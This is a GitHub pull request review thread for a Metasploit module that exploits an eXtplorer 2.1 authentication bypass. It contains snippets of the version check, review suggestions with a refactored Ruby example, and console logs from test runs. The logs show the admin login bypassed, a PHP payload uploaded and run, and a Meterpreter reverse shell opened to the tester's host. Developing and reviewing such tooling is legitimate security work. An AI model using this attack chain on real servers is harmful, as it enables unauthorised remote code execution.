Add eXtplorer v2.1 auth bypass exploit module #1221
Conversation
})

return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/
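Review bot: both `return` lines repeat the guard `res and res.code == 200`; hoisting it into one enclosing `if` also gives a natural place for an `else` that returns `Exploit::CheckCode::Safe`, which this region currently lacks, so a 200 response whose body matches neither regex falls out of the method without an explicit check code. The version regex only covers 2.1.0RC5 through 2.1.2, so any other `<version>` string on a page that still mentions eXtplorer is reported as Detected; that is the conservative result, but a one-line comment saying so would help the next reader.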
Seems like you could move the "if res and res.code == 200" into a parent if statement, and make these lines a bit shorter, then use an else for the safe check code.
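The restructuring the reviewer describes, written out as an added example that is not the PR's code: the shared guard is hoisted into one `if`, the version regex from the diff decides Vulnerable, the looser banner match decides Detected, and an explicit `else` returns Safe. `FakeResponse` is a constructed stand-in for the HTTP response object (only `code` and `body` are assumed), and the symbols stand in for the `Exploit::CheckCode` constants so the method runs outside the framework.

```ruby
# Added example: the check() logic with the guard hoisted and an explicit safe branch.
# FakeResponse is a constructed stand-in for the framework's HTTP response; only
# .code and .body are used. Symbols stand in for Exploit::CheckCode::* constants.
FakeResponse = Struct.new(:code, :body)

# Version strings the module treats as vulnerable (regex copied from the diff).
VULN_VERSION_RE = %r{<version>2\.1\.(0RC5|0|1|2)</version>}

# Broad match used only to say "eXtplorer is here, version unknown/other".
BANNER_RE = /eXtplorer/

def extplorer_check(res)
  # One guard instead of repeating "res and res.code == 200" on every line.
  # A missing or non-200 response tells us nothing, so report Unknown.
  return :unknown unless res && res.code == 200

  if res.body =~ VULN_VERSION_RE
    :vulnerable   # Exploit::CheckCode::Vulnerable
  elsif res.body =~ BANNER_RE
    :detected     # Exploit::CheckCode::Detected
  else
    :safe         # Exploit::CheckCode::Safe -- the "else" branch the review asks for
  end
end

if __FILE__ == $0
  # Constructed sample bodies, not captured from a real server.
  samples = {
    "vulnerable 2.1.0RC5" => FakeResponse.new(200, "<app><version>2.1.0RC5</version></app>"),
    "other version"       => FakeResponse.new(200, "eXtplorer <version>2.1.3</version>"),
    "unrelated page"      => FakeResponse.new(200, "<html><body>hello</body></html>"),
    "not found"           => FakeResponse.new(404, "eXtplorer"),
  }
  samples.each { |name, res| puts "#{name}: #{extplorer_check(res)}" }
end
```

Note that `2.1.10` does not match the vulnerable regex either, because the alternation must be followed immediately by `</version>`; such a version lands in the Detected branch, which is the behaviour the original two lines already had.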
I cannot reproduce this and I have tried a few different tarballs. Can you paste me the md5 or, better yet, email the md5 and archive you used to brandon_perry@rapid7.com

My Target URI was wrong.

msf exploit(extplorer_upload_exec) > set TARGETURI /
[] Started reverse handler on 192.168.1.31:4444
getuid
meterpreter >
}, | ||
'DefaultOptions' => | ||
{ | ||
'ExitFunction' => "none" |
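Review bot: `'ExitFunction' => "none"` only influences native Windows payloads; this module delivers a PHP payload to a Linux host (the test run in this thread shows `Meterpreter : php/php` on Ubuntu), so the setting has no effect here and the whole `DefaultOptions` block can be dropped rather than carried as dead configuration.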
you probably don't even need DefaultOptions at all.
Did cleanup by myself and retested:

msf exploit(extplorer_upload_exec) > check
[+] The target is vulnerable.
msf exploit(extplorer_upload_exec) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] 192.168.1.138:80 - Authenticating as user (admin)
[*] 192.168.1.138:80 - Authenticated successfully
[*] 192.168.1.138:80 - Retrieving writable subdirectories
[*] 192.168.1.138:80 - Successfully retrieved writable subdirectory (config)
[*] 192.168.1.138:80 - Uploading PHP payload (1316 bytes) to /eXtplorer/config
[+] 192.168.1.138:80 - File uploaded successfully
[*] 192.168.1.138:80 - Searching directories for file (l3xVr4qUooRD.php)
[+] 192.168.1.138:80 - Successfully found file
[*] 192.168.1.138:80 - Executing payload (/eXtplorer/config/l3xVr4qUooRD.php)
[*] Sending stage (39217 bytes) to 192.168.1.138
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.138:41454) at 2013-01-09 19:43:18 +0100
^C[-] Exploit failed: Interrupt
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter >

merging!
Add eXtplorer v2.1 authentication bypass vulnerability exploit module